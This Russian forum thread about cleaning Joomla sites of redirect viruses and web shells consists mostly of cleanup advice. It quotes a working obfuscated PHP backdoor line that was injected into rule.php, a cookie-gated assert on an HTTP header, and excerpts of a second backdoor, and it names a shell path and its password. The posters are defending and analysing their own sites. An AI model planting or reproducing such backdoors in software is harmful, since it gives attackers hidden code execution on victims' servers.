Вирус на сайте, редирект, что делать как лечить! - страница 22 - Безопасность сайтов на Joomla

А чего так бояться заражения? Что в этом такого страшного? Если есть норм бэкап, то найти заразу легко.

Встречается случаи когда кеш системы не чистится, и после чистки файлов все равно нет результата
один из способов это почистить в БД таблицу #_session  не всегда помогает на 100%, видимо еще и кешируется у провайдера или на каких либо удаленных серверах

Кэшируется обычно на компе вирусня и ждет ftp соединения.

Что можно сделать для такой ситуации:
Мобильный редирект, шелл вроде бы найден и дырки залатаны. Но периодически появляется:

в настройках jcomments (был 1 раз в customHtml модуле)
Сперва сменил пароль user и root, вскоре опять появился. Потом сменил пароль к базе данных. Вирус исчез, но может через несколько недель опять появляться, опять меняю пароль к базе данных и всё нормально.
Какие тут дыры можно залатать, и нельзя ли как-нибудь по-другому прятать файл configuration.php ? Там права 444, но может этого недостаточно...
(установлен plugin Marco's SQL Injection - LFI Interceptor)
Кто еще сталкивался с подобного рода скриптом, напишите, что вам помогло.
Спасибо.

Проверь веб директорию http://yandex.ru/promo/manul#about

Ссылка вроде занимательная, но сканирование не завершилось...
PHP error - Undefined variable: filePath
Сканирование давно проходили. Думал, может что-то конкретное, связанное с БД можно узнать. Т.к. насколько я понимаю, "взламывается" последнее время только пароль от БД. Хотя я плохо понимаю всё равно...

После работ связанных с чисткой и обновлением, закрытием всех уязвимостей, меняются все пароли иногда даже логины если они не уникальны (типа admin), пароли все набор цифр и букв как заглавные так и прописные и все возможные знаки, длина паролей от 12-14 знаков, закрывается панель управления http авторизацией как минимум. Все довольно просто.

закрывается панель управления http авторизацией как минимум.

- А разве есть панели управления без авторизации? Может я чего-то не понимаю?..
- А вот у ispmanager и phpMyAdmin - root логин так и остается root? Где-то можно/нужно изменить? (хотя у phpMyAdmin вроде не root стоит, но root вроде тоже активен...)
- Для входа в админку сайта стоит ли включать новую фичу "двух-факторная авторизация"?
- Что думаете по поводу Admin Tools Pro от Akeeba?
Спасибо.

- А разве есть панели управления без авторизации? Может я чего-то не понимаю?..

http://httpd.apache.org/docs/2.2/mod/mod_auth_digest.html#msie

- А вот у ispmanager и phpMyAdmin - root логин так и остается root? Где-то можно/нужно изменить? (хотя у phpMyAdmin вроде не root стоит, но root вроде тоже активен...)

root используется только для настроек сервера, для работы с сайтом для каждого сайта! создается свой пользователь для панели и базы данных и своя бд
[/quote]

- Для входа в админку сайта стоит ли включать новую фичу "двух-факторная авторизация"?

Как пожелаете.

- Что думаете по поводу Admin Tools Pro от Akeeba?

Ни чего стороннего ни когда не рекомендую, правильная настройка сервера и своевременное обновление движка и расширений, хватает на все 100%.

Стал счастливым обладателем очередного вируса на Joomla 1.5.26. Вроде избавился от редиректа и от самого шелла, отследил в логах как заходит взломщик на сайт. Когда удалил пару файлов редиректа, увидел в корне сайта только записанный  файл trd.php, загруженный у меня на глазах. Тут же его скачал. Прикладываю txt версию этого скрипта, суда по коду, он после выполнения должен был удалиться, но не успел. Комментарии в файле написаны по русски и много там интересного. И что самое интересное - редирект через redirect.ru был на ya.ru - для чего не понятно.

Стал счастливым обладателем очередного вируса на Joomla 1.5.26. Вроде избавился от редиректа и от самого шелла, отследил в логах как заходит взломщик на сайт. Когда удалил пару файлов редиректа, увидел в корне сайта только записанный  файл trd.php, загруженный у меня на глазах. Тут же его скачал. Прикладываю txt версию этого скрипта, суда по коду, он после выполнения должен был удалиться, но не успел. Комментарии в файле написаны по русски и много там интересного. И что самое интересное - редирект через redirect.ru был на ya.ru - для чего не понятно.

Файлик довольна токи интересный и грамотно написан, на досуге по анализирую...

Опишу, что я делал на своем сайте:
сам шелл прописался в папке: /administrator/components/com_phocagallery/front/assets/js/shadowbox/src/skin/classic/icons/config.php, при переходе по ссылке, требует ввод пароля, пароль тоже нашел в логах: ?6xlnchp7, судя по скрипту этот файл может прописаться в любую дальнюю папку. Далее Удалил строку с preg_replace сверху файла componets/com_weblinks/router.php. Нашел лишние файлы: /componets/com_content/articled.php , /componets/com_content/category.php , /includes/inc.class.php, снес их, получил ошибку в файле /includes/application.php ,в нем сверху удалил инклуд, и сайт заработал. Все это прописано в выложенном сверху скрипте. Может кому то поможет. Скорее всего, это было сделано для того, чтобы сайт выпал из индекса, смысл делать редирект на ya.ru. Как то так.

Файлик довольна токи интересный и грамотно написан, на досуге по анализирую...

Обычный загрузочный/управляющий.

Вот всегда мысль одна есть и будет
- их бы энергию да в мирных целях

Лечим Joomla от вирусов https://joomla.shneider-host.ru/blog/optimizatsiia-i-bezopasnost-joomla/kak-ochistit-sait-joomla-ot-virusov

инструкция для новичков если вылечить не удалось самостоятельно, но рекомендую все же обратится к профессионалам, по поводу
flyingspook - слышал положительные отзывы, и берет он не дорого.

Некоторые мои вопросы были проигнорированы, нашел ответы, их нужно добавить в тему!
-----------------------------------------------------------------------
configuration.php прячем за пределы сайта в любую папку:
administrator/includes/defines.php - здесь меняем путь,
/includes/defines.php - здесь меняем путь на
define('JPATH_CONFIGURATION', JPATH_ROOT . '/../folder');
Также прячем папки tmp и logs (путь в админке сайта)

хостинговый антивирь нашел очердную каку
httpdocs/plugins/editors/tinymce/jscripts/tiny_mce/plugins/example/wso2.php Sanesecurity.Malware.21995.Backdoor.UNOFFICIAL

хостинговый антивирь нашел очердную каку
httpdocs/plugins/editors/tinymce/jscripts/tiny_mce/plugins/example/wso2.php Sanesecurity.Malware.21995.Backdoor.UNOFFICIAL

Так это уже не атака, а shell залили

Ребят, помогите убрать shell, ужасные ссылки левые на сайте  http://www.sosnovobor.ru/sanatornoe-lechenie.html

Ребят, помогите убрать shell, ужасные ссылки левые на сайте  http://www.sosnovobor.ru/sanatornoe-lechenie.html

Пишите мне в аську, тема с отзывами https://forum.antichat.ru/threads/375030/

Здравствуйте! Похоже ли это на шелл? обнаружила его на всех своих сайтах на хосте (12 шт, из них Joomla - 11 шт). php файл был размещен даже на сайте html5 (собственно, он мне и помог обнаружить этот левый php). удалила его со всех сайтов и прекратилось еженедельное заражение js файлов мобильным редиректом.

Да

Здравствуйте! Обнаружил, что в папке с шаблоном несколько дней назад появился файл .php со странным названием

файл содержит такой код (несколько цифр изменил на всякий случай)

что это такое, кто-нибудь может подсказать?

Ну явно не код скрипта Joomla . Нет проверки на вход через index.php Joomla. Загрузка кода из массива POST
Поставь временно JHackGuard и запрети выполнение POST . И ищи шелл.

что это такое, кто-нибудь может подсказать?

Вас уже взломали, чистите сайт и обновляйте все что требуется.

Вас уже взломали, чистите сайт и обновляйте все что требуется.

А есть смысл восстанавливать бекап недельной давности, например (файл этот залит позже) и расслабиться или все равно взломают опять, раз уже какая-то есть "дыра"

А есть смысл восстанавливать бекап недельной давности, например (файл этот залит позже) и расслабиться или все равно взломают опять, раз уже какая-то есть "дыра"

А как вы можете убедиться когда был файл залит?, можете сделать по старому бекапу сумму md5hash файлов старого движка и щас взломаного, если вы уверены что старый конечно чистый, выявить дату файлов которые попадают в разницу и проанализировать по ним логи с целью выявления ошибки и пофиксить, если просто откатывать бекап взлом рано или поздно снова повторится, также обязательны профилактические меры

Спасибо за ответы. Будем лечить

Здравствуйте. Новогодний подарок тут получил, вроде он не успел сработать, но не знаю... Скажите, пожалуйста, что это такое, как, почему и зачем? !
1) В конец файла /includes/defines.php добавилась строчка:
2) В конец файла /libraries/joomla/access/rule.php добавилась строчка:
3) Появился новый файл: /libraries/simplepie/simplepie.lib.php (см. вложение)

Здравствуйте. Новогодний подарок тут получил, вроде он не успел сработать, но не знаю... Скажите, пожалуйста, что это такое, как, почему и зачем? !
1) В конец файла /includes/defines.php добавилась строчка:

Код: php

if(strpos(implode($_SERVER),"O:")){exit;}

2) В конец файла /libraries/joomla/access/rule.php добавилась строчка:

Код: php

if((md5(@$_COOKIE[ssid])=="0d39ee6941ac9d79b6fe314bbaca617e")){error_reporting(0);@array_map("a\x73"."sert",(array) $_SERVER[HTTP_X]);}

3) Появился новый файл: /libraries/simplepie/simplepie.lib.php (см. вложение)

Первая строчка это фикс последней баги через сессию, второй это бегдор, вообщем чел ломанул и закрепился чтоб кроме него больше ни кто, не лез)))

Вложенный файл тоже является запутанным бегдором:

36. $id = $_SERVER['HTTP_SESSION'];
...
114.  */ $a='as';
...
 */ $b='sert'; $a=$a.$b;
...
161. */ $start = strpos($sess,'0d39ee');
...
202.  */ if($start===0){@${a}($id);}

Скажите, пожалуйста, что это такое, как, почему и зачем? !

Возвращается 2011г.
Все взломы перешли давно в стадию.
Делают взломы для индивидуального использования, т.е. дальнейшей продажи или слива трафика.
Набирают сервера для чего то массового.
Ну и как все "угоны" сначала в отстойник, и потом использование. (многие и знать не будут что они уже давным давно взломаны)

Возвращается 2011г.

Я имел в виду конкретно мой случай, если я правильно понял...

Спасибо за ответ, winstrool.

это фикс последней баги через сессию

Что за последняя бага? В 3.4.5 была? В 3.4.6 есть? И зачем он ее пофиксил? )
Т.е. он получается, что доступ ко всем файлам на сайте получил? А может он перейти в папки, те, что выше папки с сайтом?
Если взломали, то у чела-взломщика обязательно будут украденные пароли, или это как-то можно так сделать, что без взлома паролей, получаешь доступ?

Я имел в виду конкретно мой случай, если я правильно понял...

Спасибо за ответ, winstrool.Что за последняя бага? В 3.4.5 была? В 3.4.6 есть? И зачем он ее пофиксил? )
Т.е. он получается, что доступ ко всем файлам на сайте получил? А может он перейти в папки, те, что выше папки с сайтом?
Если взломали, то у чела-взломщика обязательно будут украденные пароли, или это как-то можно так сделать, что без взлома паролей, получаешь доступ?

Если у вас хостинг и нет разграничений по папкам пользователям то да имеет доступ ко всему.
Профиксили баг 3.4.5 и закрыли возможность другим взломать.
Имеют доступ сейчас ко всему и файлам и к бд

В 3.4.6 нету она закрывает все что было в 3.4.5